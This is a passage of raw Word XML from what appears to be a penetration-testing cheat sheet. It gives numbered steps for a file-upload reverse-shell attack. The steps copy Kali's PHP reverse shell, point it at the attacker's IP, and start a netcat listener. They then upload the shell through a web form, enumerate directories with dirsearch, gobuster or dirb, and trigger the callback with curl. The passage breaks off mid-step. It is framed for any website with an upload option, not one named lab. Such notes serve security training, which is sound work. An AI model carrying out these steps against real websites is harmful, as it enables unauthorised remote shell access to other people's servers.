    </w:p>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814CF0" w14:paraId="0BDDF0CD" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B88EEA1" w14:textId="63E26C35" w:rsidR="00814CF0" w:rsidRDefault="00681C46" w:rsidP="00AA366F">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00814CF0">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3F375414" w14:textId="0AF992F5" w:rsidR="00AA366F" w:rsidRPr="00AA366F" w:rsidRDefault="00AA366F" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA366F">
              <w:t>Terminal Commands</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AA366F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(The file in question is already installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A168F1" w14:textId="259568C5" w:rsidR="00814CF0" w:rsidRPr="0011225F" w:rsidRDefault="00466824" w:rsidP="00AA366F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS AN UPLOAD OPTION ON ONE OF THE WEBPAGES, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27ADFB4B" w14:textId="4376E4DF" w:rsidR="00814CF0" w:rsidRDefault="00466824" w:rsidP="00AA366F">
            <w:r>
              <w:t>Once it has been established that there is an upload option, check if any files are permitted to be uploaded. If this is the case, then a malicious script can be uploaded that can be used to call back to a netcat listener.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0095332F">
              <w:t xml:space="preserve">First off, copy </w:t>
            </w:r>
            <w:r>
              <w:t>and save the reverse_php.php somewhere memorable</w:t>
            </w:r>
            <w:r w:rsidR="0095332F">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095332F" w:rsidRPr="0095332F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r w:rsidR="0095332F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0095332F" w:rsidRPr="0095332F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/webshells/php/php-reverse-shell.php</w:t>
            </w:r>
            <w:r w:rsidR="0095332F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0095332F" w:rsidRPr="0095332F">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D698DE" w14:textId="77777777" w:rsidR="00466824" w:rsidRPr="0095332F" w:rsidRDefault="0095332F" w:rsidP="00AA366F">
            <w:r w:rsidRPr="0095332F">
              <w:t>Next, cd to wherever it has just been copied to:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F3D0F39" w14:textId="77777777" w:rsidR="0095332F" w:rsidRDefault="0095332F" w:rsidP="00AA366F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0095332F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0095332F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E535C0" w14:textId="77777777" w:rsidR="0095332F" w:rsidRDefault="0095332F" w:rsidP="00AA366F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Here, it is easier to change the name of the script to whatever you want:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA366F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mv</w:t>
            </w:r>
            <w:r w:rsidR="00AA366F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA366F" w:rsidRPr="00AA366F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>php-reverse-shell.php</w:t>
            </w:r>
            <w:r w:rsidR="00AA366F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA366F" w:rsidRPr="00AA366F">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>FILENAME.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7343D20B" w14:textId="33303009" w:rsidR="00AA366F" w:rsidRDefault="00AA366F" w:rsidP="00AA366F">
            <w:r w:rsidRPr="00AA366F">
              <w:t xml:space="preserve">Now, use </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">a text editor such as Sublime to open the script and edit the </w:t>
            </w:r>
            <w:r w:rsidR="007B07B9">
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> variable </w:t>
            </w:r>
            <w:r w:rsidR="007B07B9">
              <w:t>where the comment ‘CHANGE THIS’ can be seen to your own IP address for the interface you want to connect on (from 127.0.0.1 to whatever you want).</w:t>
            </w:r>
            <w:r w:rsidR="007B07B9">
              <w:br/>
              <w:t>The port number can be 1234, or feel free to change this, but just remember what it is.</w:t>
            </w:r>
            <w:r w:rsidR="007B07B9">
              <w:br/>
              <w:t>Ensure that the file is saved in the text editor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B82" w14:paraId="5FCC1CAE" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16E0DB3D" w14:textId="34FD75F7" w:rsidR="00125B82" w:rsidRDefault="00681C46" w:rsidP="00AA366F">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00125B82">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B47801C" w14:textId="095352C9" w:rsidR="00125B82" w:rsidRPr="00AA366F" w:rsidRDefault="00125B82" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</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110AA0EB" w14:textId="79FD5A39" w:rsidR="00125B82" w:rsidRDefault="00125B82" w:rsidP="00AA366F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>Set up a netcat listener using:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lvnp </w:t>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1234</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:t>Listen mode (for inbound connections)</w:t>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:t>Verbose information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:t>Numeric, IP address (no DNS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:t>Port number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA366F" w14:paraId="7084CA24" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33E9B945" w14:textId="67C64EBA" w:rsidR="00AA366F" w:rsidRDefault="00681C46" w:rsidP="00AA366F">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00AA366F">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00125B82">
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28754E88" w14:textId="4509ADDD" w:rsidR="00AA366F" w:rsidRPr="00AA366F" w:rsidRDefault="00AA366F" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00466824">
              <w:t>Target Webpage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(Using the webpage upload functionality)</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37526F4E" w14:textId="0546460A" w:rsidR="00AA366F" w:rsidRDefault="00AA366F" w:rsidP="00AA366F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA366F">
              <w:t>Next</w:t>
            </w:r>
            <w:r>
              <w:t>, upload the file on the website where it allows an upload. If there is any kind of security then it is likely to not work as the input validation or IPS will block the script being uploaded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001324EA" w14:paraId="4585C6D2" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1C554C00" w14:textId="19D1F35E" w:rsidR="001324EA" w:rsidRDefault="00681C46" w:rsidP="00AA366F">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="001324EA">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0F51516D" w14:textId="6601A184" w:rsidR="001324EA" w:rsidRPr="00466824" w:rsidRDefault="001324EA" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirsearch</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00125B82">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Or any webpage enumeration tool)</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3DAD89A1" w14:textId="5AC28B13" w:rsidR="001324EA" w:rsidRPr="00AA366F" w:rsidRDefault="001324EA" w:rsidP="00AA366F">
            <w:r>
              <w:t>Now, once the php file has been uploaded, we just need to find the most probable place to where the file was uploaded to on the website. Try one of the following:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dirsearch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://X.X.X.X </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/dirb/wordlists/</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>common.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001324EA">
              <w:t>Or</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">gobuster </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://X.X.X.X </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/seclists/Discovery/Web-Content/</w:t>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>common.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001324EA">
              <w:t>Or</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A3CF7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dirb</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>242</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/dirb/wordlists/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>big</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC2D5A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3465">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="001324EA">
              <w:t>And hopefully the location of where the script may have been uploaded to will become apparent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00814CF0" w14:paraId="3C5CF87D" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C6BA53D" w14:textId="05A625BE" w:rsidR="00814CF0" w:rsidRDefault="00681C46" w:rsidP="00AA366F">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00814CF0">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00004E59">
              <w:t>e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28AEFAEA" w14:textId="0B7E8CA6" w:rsidR="00814CF0" w:rsidRPr="005C74B8" w:rsidRDefault="001324EA" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>curl</w:t>
            </w:r>
            <w:r w:rsidR="005D723F">
              <w:br/>
            </w:r>
            <w:r w:rsidR="005D723F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(the command is installed by default in Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BDCB01C" w14:textId="5A689E83" w:rsidR="00814CF0" w:rsidRDefault="00AA366F" w:rsidP="00AA366F">
            <w:r>
              <w:t xml:space="preserve">Now that the file has been uploaded, </w:t>
            </w:r>
            <w:r w:rsidR="001324EA">
              <w:t>cURL</w:t>
            </w:r>
            <w:r w:rsidRPr="001324EA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>can be used to execute the script</w:t>
            </w:r>
            <w:r w:rsidR="001324EA">
              <w:t xml:space="preserve"> remotely</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and call back to a netcat listener.</w:t>
            </w:r>
            <w:r w:rsidR="001324EA">
              <w:br/>
              <w:t>Use the following command:</w:t>
            </w:r>
            <w:r w:rsidR="001324EA">
              <w:br/>
            </w:r>
            <w:r w:rsidR="001324EA">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001324EA" w:rsidRPr="005D723F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">curl </w:t>
            </w:r>
            <w:r w:rsidR="005D723F" w:rsidRPr="005D723F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://X.X.X.X/uploads/php-reverse-shell.php</w:t>
            </w:r>
            <w:r w:rsidR="005D723F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="005D723F">
